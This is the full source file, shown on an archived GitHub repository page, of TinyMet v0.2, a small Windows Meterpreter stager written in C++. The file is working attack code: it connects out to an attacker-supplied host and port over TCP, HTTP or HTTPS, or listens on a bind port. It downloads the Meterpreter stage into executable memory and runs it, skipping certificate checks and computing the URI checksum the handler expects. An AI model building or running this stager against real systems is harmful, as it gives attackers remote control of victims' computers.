This repository has been archived by the owner on Aug 20, 2019. It is now read-only.
-
Notifications
You must be signed in to change notification settings - Fork 44
/
Source.cpp
383 lines (327 loc) · 13.5 KB
/
Source.cpp
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369
370
371
372
373
374
375
376
377
378
379
380
381
382
//بسم الله الرحمن الرحيم
/************************************************
* [TinyMet v0.2] *
* The Tiny Meterpreter Executable *
*************************************************
- @SheriefEldeeb
- http://tinymet.com
- http://eldeeb.net
- Made in Egypt :)
************************************************/
/*
Copyright (c) 2015, Sherif Eldeeb "eldeeb.net"
All rights reserved.
Redistribution and use in source and binary forms, with or without
modification, are permitted provided that the following conditions are met:
* Redistributions of source code must retain the above copyright
notice, this list of conditions and the following disclaimer.
* Redistributions in binary form must reproduce the above copyright
notice, this list of conditions and the following disclaimer in the
documentation and/or other materials provided with the distribution.
* Neither the name of the <organization> nor the
names of its contributors may be used to endorse or promote products
derived from this software without specific prior written permission.
THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS "AS IS" AND
ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE IMPLIED
WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE ARE
DISCLAIMED. IN NO EVENT SHALL <COPYRIGHT HOLDER> BE LIABLE FOR ANY
DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES
(INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES;
LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND
ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
(INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE OF THIS
SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
*/
#include <WinSock2.h>
#include <Wininet.h>
#include <Windows.h>
#include <stdio.h>
#pragma comment(lib, "Ws2_32.lib")
#pragma comment(lib, "wininet.lib")
// Globals ...
unsigned long hostip;
unsigned short portnumber;
unsigned char *buf;
unsigned int bufsize;
LPWSTR* arglist;
char* TRANSPORT;
char* LHOST;
char* LPORT;
char helptext[] = "TinyMet v0.2\ntinymet.com\n\n"
"Usage: tinymet.exe [transport] LHOST LPORT\n"
"Or you can specify arguments through filename itself, separated by underscore.\n"
"like TRANSPORT_LHOST_LPORT.exe\n\n"
"Available transports are as follows:\n"
" 0: reverse_tcp\n"
" 1: reverse_http\n"
" 2: reverse_https\n"
" 3: bind_tcp\n"
"\nExample:\n"
"\"tinymet.exe 2 host.com 443\"\nwill use reverse_https and connect to host.com:443\n"
"setting the filename to \"2_host.com_443.exe\" and running it without args will do exactly the same\n";
// Functions ...
void err_exit(char* message){
printf("\nError: %s\nGetLastError:%d", message, GetLastError());
exit(-1);
}
void gen_random(char* s, const int len) { // ripped from http://stackoverflow.com/questions/440133/how-do-i-create-a-random-alpha-numeric-string-in-c
static const char alphanum[] =
"0123456789"
"ABCDEFGHIJKLMNOPQRSTUVWXYZ"
"abcdefghijklmnopqrstuvwxyz";
for (int i = 0; i < len; ++i) {
s[i] = alphanum[rand() % (sizeof(alphanum)-1)];
}
s[len] = 0;
}
int text_checksum_8(char* text)
{
UINT temp = 0;
for (UINT i = 0; i < strlen(text); i++)
{
temp += (int)text[i];
}
return temp % 0x100;
}
unsigned char* met_tcp(char* host, char* port, bool bind_tcp)
{
WSADATA wsaData;
SOCKET sckt;
SOCKET cli_sckt;
SOCKET buffer_socket;
struct sockaddr_in server;
hostent *hostName;
int length = 0;
int location = 0;
if (WSAStartup(MAKEWORD(2, 2), &wsaData) != 0){
err_exit("WSAStartup");
}
hostName = gethostbyname(host);
if (hostName == nullptr){
err_exit("gethostbyname");
}
hostip = *(unsigned long*)hostName->h_addr_list[0];
portnumber = htons(atoi(port));
server.sin_addr.S_un.S_addr = hostip;
server.sin_family = AF_INET;
server.sin_port = portnumber;
sckt = socket(AF_INET, SOCK_STREAM, NULL);
if (sckt == INVALID_SOCKET){
err_exit("socket()");
}
//////////////////////////////
if (bind_tcp){
if (bind(sckt, (struct sockaddr *)&server, sizeof(struct sockaddr)) != 0) {
err_exit("bind()");
}
if (listen(sckt, SOMAXCONN) != 0) {
err_exit("listen()");
}
if ((cli_sckt = accept(sckt, NULL, NULL)) == INVALID_SOCKET)
{
err_exit("accept()");
}
buffer_socket = cli_sckt;
}
//
else {
if (connect(sckt, (sockaddr*)&server, sizeof(server)) != 0){
err_exit("connect()");
}
buffer_socket = sckt;
}
//////////////////////////////
// When reverse_tcp and bind_tcp are used, the multi/handler sends the size of the stage in the first 4 bytes before the stage itself
// So, we read first 4 bytes to use it for memory allocation calculations
recv(buffer_socket, (char*)&bufsize, 4, 0); // read first 4 bytes = stage size
buf = (unsigned char*)VirtualAlloc(NULL, bufsize + 5, MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// Q: why did we allocate bufsize+5? what's those extra 5 bytes?
// A: the stage is a large shellcode "ReflectiveDll", and when the stage gets executed, IT IS EXPECTING TO HAVE THE SOCKET NUMBER IN _EDI_ register.
// so, we want the following to take place BEFORE executing the stage: "mov edi, [socket]"
// opcode for "mov edi, imm32" is 0xBF
buf[0] = 0xbf; // opcode of "mov edi, WhateverFollows"
memcpy(buf + 1, &buffer_socket, 4); // got it?
length = bufsize;
while (length != 0){
int received = 0;
received = recv(buffer_socket, ((char*)(buf + 5 + location)), length, 0);
location = location + received;
length = length - received;
}
//////////////////////////////
return buf;
}
unsigned char* rev_http(char* host, char* port, bool WithSSL){
// Steps:
// 1) Calculate a random URI->URL with `valid` checksum; that is needed for the multi/handler to distinguish and identify various framework related requests "i.e. coming from stagers" ... we'll be asking for checksum==92 "INITM", which will get the patched stage in return.
// 2) Decide about whether we're reverse_http or reverse_https, and set flags appropriately.
// 3) Prepare buffer for the stage with WinInet: InternetOpen, InternetConnect, HttpOpenRequest, HttpSendRequest, InternetReadFile.
// 4) Return pointer to the populated buffer to caller function.
//***************************************************************//
// Variables
char uri[5] = { 0 }; //4 chars ... it can be any length actually.
char fullurl[6] = { 0 }; // fullurl is ("/" + URI)
unsigned char* buffer = nullptr;
DWORD flags = 0;
int dwSecFlags = 0;
// Step 1: Calculate a random URI->URL with `valid` checksum; that is needed for the multi/handler to distinguish and identify various framework related requests "i.e. coming from stagers" ... we'll be asking for checksum==92 "INITM", which will get the patched stage in return.
int checksum = 0;
srand(GetTickCount());
while (true) //Keep getting random values till we succeed, don't worry, computers are pretty fast and we're not asking for much.
{
gen_random(uri, 4); //Generate a 4 char long random string ... it could be any length actually, but 4 sounds just fine.
checksum = text_checksum_8(uri); //Get the 8-bit checksum of the random value
if (checksum == 92) //If the checksum == 92, it will be handled by the multi/handler correctly as a "INITM" and will send over the stage.
{
break; // We found a random string that checksums to 98
}
}
strcpy(fullurl, "/");
strcat(fullurl, uri);
// 2) Decide about whether we're reverse_http or reverse_https, and set flags appropriately.
if (WithSSL) {
flags = (INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI | INTERNET_FLAG_SECURE | INTERNET_FLAG_IGNORE_CERT_CN_INVALID | INTERNET_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_UNKNOWN_CA);
}
else {
flags = (INTERNET_FLAG_RELOAD | INTERNET_FLAG_NO_CACHE_WRITE | INTERNET_FLAG_NO_AUTO_REDIRECT | INTERNET_FLAG_NO_UI);
}
// 3) Prepare buffer for the stage with WinInet:
// InternetOpen, InternetConnect, HttpOpenRequest, HttpSendRequest, InternetReadFile.
// 3.1: HINTERNET InternetOpen(_In_ LPCTSTR lpszAgent, _In_ DWORD dwAccessType, _In_ LPCTSTR lpszProxyName, _In_ LPCTSTR lpszProxyBypass, _In_ DWORD dwFlags);
HINTERNET hInternetOpen = InternetOpen("Mozilla/4.0 (compatible; MSIE 6.1; Windows NT)", INTERNET_OPEN_TYPE_PRECONFIG, NULL, NULL, NULL);
if (hInternetOpen == NULL){
err_exit("InternetOpen()");
}
// 3.2: InternetConnect
HINTERNET hInternetConnect = InternetConnect(hInternetOpen, host, atoi(port), NULL, NULL, INTERNET_SERVICE_HTTP, NULL, NULL);
if (hInternetConnect == NULL){
err_exit("InternetConnect()");
}
// 3.3: HttpOpenRequest
HINTERNET hHTTPOpenRequest = HttpOpenRequest(hInternetConnect, "GET", fullurl, NULL, NULL, NULL, flags, NULL);
if (hHTTPOpenRequest == NULL){
err_exit("HttpOpenRequest()");
}
// 3.4: if (SSL)->InternetSetOption
if (WithSSL){
dwSecFlags = SECURITY_FLAG_IGNORE_CERT_DATE_INVALID | SECURITY_FLAG_IGNORE_CERT_CN_INVALID | SECURITY_FLAG_IGNORE_WRONG_USAGE | SECURITY_FLAG_IGNORE_UNKNOWN_CA | SECURITY_FLAG_IGNORE_REVOCATION;
InternetSetOption(hHTTPOpenRequest, INTERNET_OPTION_SECURITY_FLAGS, &dwSecFlags, sizeof(dwSecFlags));
}
// 3.5: HttpSendRequest
if (!HttpSendRequest(hHTTPOpenRequest, NULL, NULL, NULL, NULL))
{
err_exit("HttpSendRequest()");
}
// 3.6: VirtualAlloc enough memory for the stage ... 4MB are more than enough
buffer = (unsigned char*)VirtualAlloc(NULL, (4 * 1024 * 1024), MEM_COMMIT, PAGE_EXECUTE_READWRITE);
// 3.7: InternetReadFile: keep reading till nothing is left.
BOOL keepreading = true;
DWORD bytesread = -1;
DWORD byteswritten = 0;
while (keepreading && bytesread != 0)
{
keepreading = InternetReadFile(hHTTPOpenRequest, (buffer + byteswritten), 4096, &bytesread);
byteswritten += bytesread;
}
// 4) Return pointer to the populated buffer to caller function.
return buffer;
}
char* wchar_to_char(wchar_t* orig){
size_t origsize = wcslen(orig) + 1;
const size_t newsize = origsize * 2;
char *nstring = (char*)VirtualAlloc(NULL, newsize, MEM_COMMIT, PAGE_READWRITE);
wcstombs(nstring, orig, origsize);
return nstring;
};
void parse_args_from_cl(const wchar_t* args) {
wchar_t* filename;
wchar_t* firstunderscore;
wchar_t* lastunderscore;
wchar_t* lastdot;
filename = wcsrchr(arglist[0], '\\'); // Aargh! (under remarks, note) https://msdn.microsoft.com/en-us/library/windows/desktop/ms683156(v=vs.85).aspx
// GetCommandLineW() behaves different if being debugged, sometimes the arglist[0] has full path, and sometimes it will be just the name :/
// COUNTLESS hours spent trying to find the issue (not that much, but annoying as hell)
if (!filename) {
filename = arglist[0];
}
else {
filename = filename + 1;
}
lastdot = wcsrchr(filename, '.'); // get last . before .exe extension
*lastdot = L'\0'; // now we null-terminated filename string at last dot, effectively removing extension
// now filename is going to be a plain "0_host.com_port"
firstunderscore = wcschr(filename, '_'); // == NULL if no underscores at all in filename
if (!firstunderscore) {
printf(helptext);
exit(-1);
}
*firstunderscore = L'\0'; // now we can parse the transport, null terminated "0[NULL]host.com_80"
TRANSPORT = wchar_to_char(filename);
lastunderscore = wcschr(firstunderscore + 1, '_'); // == NULL if there's no OTHER underscore after the first one
if (!lastunderscore) { // no _ and argscount == 1?
printf(helptext);
exit(-1);
}
*lastunderscore = L'\0'; // now we can parse the LHOST, null terminated "0[NULL]host.com[NULL]80"
LHOST = wchar_to_char(firstunderscore + 1);
LPORT = wchar_to_char(lastunderscore + 1); // :)
}
int main()
{
int argsCount;
arglist = CommandLineToArgvW(GetCommandLineW(), &argsCount);
// basic error checking
if (NULL == arglist) { // problem parsing?
err_exit("CommandLineToArgvW & GetCommandLineW");
}
/* PARSING ARGUMENTS */
/*
Now, we start parsing arguments "transport, lport and lhost";
TL;DR version: if argscount is 4, parse from command line, if it's one and there're two underscores in filename, get from filename.
Longer version:
We have two options to determine transport, lhost and lport:
1) they're passed as command line arguments "tinymet.exe 0 host.com 80"; in this case argscount == 4
2) they're parsed from the filename "0_host.com_80.exe"; in this case:
2.a) argscount == 1, AND
2.b) there's two underscores in the name separating arguments
We'll set the globals "TRANSPORT, LHOST & LPORT accordingly
*/
// Case 1: "tinymet.exe 0 host.exe 80"
if (argsCount == 4) {
TRANSPORT = wchar_to_char(arglist[1]);
LHOST = wchar_to_char(arglist[2]);
LPORT = wchar_to_char(arglist[3]);
}
// Case 2: maybe "1_host.com_80.exe", then parse, or simply "tinymet.exe" then print_help and exit.
else if (argsCount == 1) {
parse_args_from_cl(arglist[0]); // that GetCommandLineW()/CommandLineToArgvW() arglist[0] is freakin' stupid
// ... sometimes it has the path, and sometimes it's the filename without path
}
// ... you simply have no idea how this thing works
else {
printf(helptext);
exit(-1);
}
// by now, the program has either exited because of error, or all args are parsed ...
printf("T:%s H:%s P:%s\n", TRANSPORT, LHOST, LPORT);
// pick transport ...
switch (TRANSPORT[0]) {
case '0':
buf = met_tcp(LHOST, LPORT, FALSE);
break;
case '1':
buf = rev_http(LHOST, LPORT, FALSE);
break;
case '2':
buf = rev_http(LHOST, LPORT, TRUE);
break;
case '3':
buf = met_tcp(LHOST, LPORT, TRUE);
break;
default:
printf(helptext);
err_exit("Transport should be 0,1,2 or 3"); // transport is not valid
}
(*(void(*)())buf)();
exit(0);
}